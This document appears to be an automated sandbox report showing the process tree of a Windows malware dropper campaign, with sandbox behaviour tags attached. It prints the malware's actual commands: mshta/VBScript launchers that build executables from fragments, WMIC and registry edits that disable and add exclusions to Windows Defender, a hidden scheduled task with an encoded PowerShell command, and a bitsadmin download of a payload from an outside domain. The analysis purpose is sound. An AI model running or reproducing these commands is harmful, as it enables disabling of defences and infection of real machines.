C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "14⤵
-
C:\Windows\SysWOW64\control.execontrol .\FUEj5.QM14⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM15⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM16⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM17⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -Im "WCmazA_xISA1qNzCaaRnLi6O.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\TqhsT9nmJmEeKVXH993sOyjd.exe"C:\Users\Admin\Documents\TqhsT9nmJmEeKVXH993sOyjd.exe"8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\35NQzL1aUT3nu0pxZmWjHnLT.exe"C:\Users\Admin\Documents\35NQzL1aUT3nu0pxZmWjHnLT.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"9⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xe8,0xec,0xf0,0xc4,0xf4,0x7fffacd14f50,0x7fffacd14f60,0x7fffacd14f7010⤵
-
C:\Users\Admin\Documents\g9nD9XH9n5hx332iqs3s_PgQ.exe"C:\Users\Admin\Documents\g9nD9XH9n5hx332iqs3s_PgQ.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\tmpE195_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpE195_tmp.exe"9⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tmpE195_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpE195_tmp.exe10⤵
-
C:\Users\Admin\Documents\Pui9pcl_7y6FsWbmlvqgrlHn.exe"C:\Users\Admin\Documents\Pui9pcl_7y6FsWbmlvqgrlHn.exe" /mixtwo8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Pui9pcl_7y6FsWbmlvqgrlHn.exe" /f & erase "C:\Users\Admin\Documents\Pui9pcl_7y6FsWbmlvqgrlHn.exe" & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Pui9pcl_7y6FsWbmlvqgrlHn.exe" /f10⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\K_MyYiN18aWCXexZrRX5kwmL.exe"C:\Users\Admin\Documents\K_MyYiN18aWCXexZrRX5kwmL.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\Documents\K_MyYiN18aWCXexZrRX5kwmL.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"=="""" for %w iN ( ""C:\Users\Admin\Documents\K_MyYiN18aWCXexZrRX5kwmL.exe"" ) do taskkill /f -Im ""%~nXw"" ", 0,TrUE ))9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\Documents\K_MyYiN18aWCXexZrRX5kwmL.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""=="" for %w iN ( "C:\Users\Admin\Documents\K_MyYiN18aWCXexZrRX5kwmL.exe" ) do taskkill /f -Im "%~nXw"10⤵
-
C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""=="""" for %w iN ( ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" ", 0,TrUE ))12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "=="" for %w iN ( "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRipT:cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ).RuN("Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN © /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I& StArT control.exe ..\QVNGP.I & del /Q * " , 0, true ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EChO | Set /p = "MZ" > XAJ5SctM.IMN © /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX+ KPeo.Pvp + _OTV19C.~ +EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I&StArT control.exe ..\QVNGP.I &del /Q *13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>XAJ5SctM.IMN"14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "14⤵
-
C:\Windows\SysWOW64\control.execontrol.exe ..\QVNGP.I14⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\QVNGP.I15⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\QVNGP.I16⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\QVNGP.I17⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -Im "K_MyYiN18aWCXexZrRX5kwmL.exe"11⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:6410⤵
-
C:\Users\Admin\Documents\7y3NdIrVK2i3FDWE71OLqeGI.exe"C:\Users\Admin\Documents\7y3NdIrVK2i3FDWE71OLqeGI.exe"8⤵
-
C:\Users\Admin\Documents\7y3NdIrVK2i3FDWE71OLqeGI.exe"C:\Users\Admin\Documents\7y3NdIrVK2i3FDWE71OLqeGI.exe"9⤵
-
C:\Users\Admin\Documents\UPmN2GnAv_fT2qkoZuZrCqNC.exe"C:\Users\Admin\Documents\UPmN2GnAv_fT2qkoZuZrCqNC.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zSDC74.tmp\Install.exe.\Install.exe9⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zSE52F.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gKSvCLBMz" /SC once /ST 04:14:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gKSvCLBMz"11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gKSvCLBMz"11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 14:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\PFQmjKf.exe\" uG /site_id 668658 /S" /V1 /F11⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\aIdDvwgbiTJCwnUi9OM7f3Nv.exe"C:\Users\Admin\Documents\aIdDvwgbiTJCwnUi9OM7f3Nv.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-B07T8.tmp\aIdDvwgbiTJCwnUi9OM7f3Nv.tmp"C:\Users\Admin\AppData\Local\Temp\is-B07T8.tmp\aIdDvwgbiTJCwnUi9OM7f3Nv.tmp" /SL5="$80642,506127,422400,C:\Users\Admin\Documents\aIdDvwgbiTJCwnUi9OM7f3Nv.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-9R1T4.tmp\Sharefolder.exe"C:\Users\Admin\AppData\Local\Temp\is-9R1T4.tmp\Sharefolder.exe" /S /UID=270910⤵
- Drops file in Drivers directory
- Adds Run key to start application
-
C:\Program Files\Windows Security\IKJYAXEXQF\foldershare.exe"C:\Program Files\Windows Security\IKJYAXEXQF\foldershare.exe" /VERYSILENT11⤵
-
C:\Users\Admin\AppData\Local\Temp\49-cb65e-9b6-ef4bf-c0d337e332ce1\Kilaekovase.exe"C:\Users\Admin\AppData\Local\Temp\49-cb65e-9b6-ef4bf-c0d337e332ce1\Kilaekovase.exe"11⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\8c-6be02-95e-4b993-53ea1bc39f817\Tefuryfamu.exe"C:\Users\Admin\AppData\Local\Temp\8c-6be02-95e-4b993-53ea1bc39f817\Tefuryfamu.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1ebfdozg.a5p\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\1ebfdozg.a5p\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\1ebfdozg.a5p\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1ebfdozg.a5p\GcleanerEU.exe" & exit14⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f15⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pl3vks4r.lze\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\pl3vks4r.lze\installer.exeC:\Users\Admin\AppData\Local\Temp\pl3vks4r.lze\installer.exe /qn CAMPAIGN="654"13⤵
- Enumerates connected drives
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\pl3vks4r.lze\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\pl3vks4r.lze\ EXE_CMD_LINE="/forcecleanup /wintime 1633098592 /qn CAMPAIGN=""654"" " CAMPAIGN="654"14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xj3njumf.xm1\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\xj3njumf.xm1\any.exeC:\Users\Admin\AppData\Local\Temp\xj3njumf.xm1\any.exe13⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hnaikavm.tii\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\hnaikavm.tii\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\hnaikavm.tii\gcleaner.exe /mixfive13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\hnaikavm.tii\gcleaner.exe" & exit14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f15⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eayqbpqj.d5p\autosubplayer.exe /S & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\eayqbpqj.d5p\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\eayqbpqj.d5p\autosubplayer.exe /S13⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse9900.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse9900.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse9900.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse9900.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse9900.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse9900.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse9900.tmp\tempfile.ps1"14⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z14⤵
- Download via BitsAdmin
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -p4U0Ogx1iwngt6sq -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -p8bCt3dMBvx2nDod -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse9900.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse9900.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse9900.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse9900.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse9900.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\EhdpuqeT\EhdpuqeT.dll" EhdpuqeT14⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\EhdpuqeT\EhdpuqeT.dll" EhdpuqeT15⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse9900.tmp\tempfile.ps1"14⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse9900.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse9900.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse9900.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse9900.tmp\tempfile.ps1"14⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT14⤵
-
C:\Users\Admin\Documents\G0BIQuPDVqp6W8vb29KhvdSC.exe"C:\Users\Admin\Documents\G0BIQuPDVqp6W8vb29KhvdSC.exe" silent8⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\Documents\zWGc56WhB6HjIM5HHvsxga3K.exe"C:\Users\Admin\Documents\zWGc56WhB6HjIM5HHvsxga3K.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\8413030.scr"C:\Users\Admin\AppData\Roaming\8413030.scr" /S7⤵
- Suspicious behavior: SetClipboardViewer
-
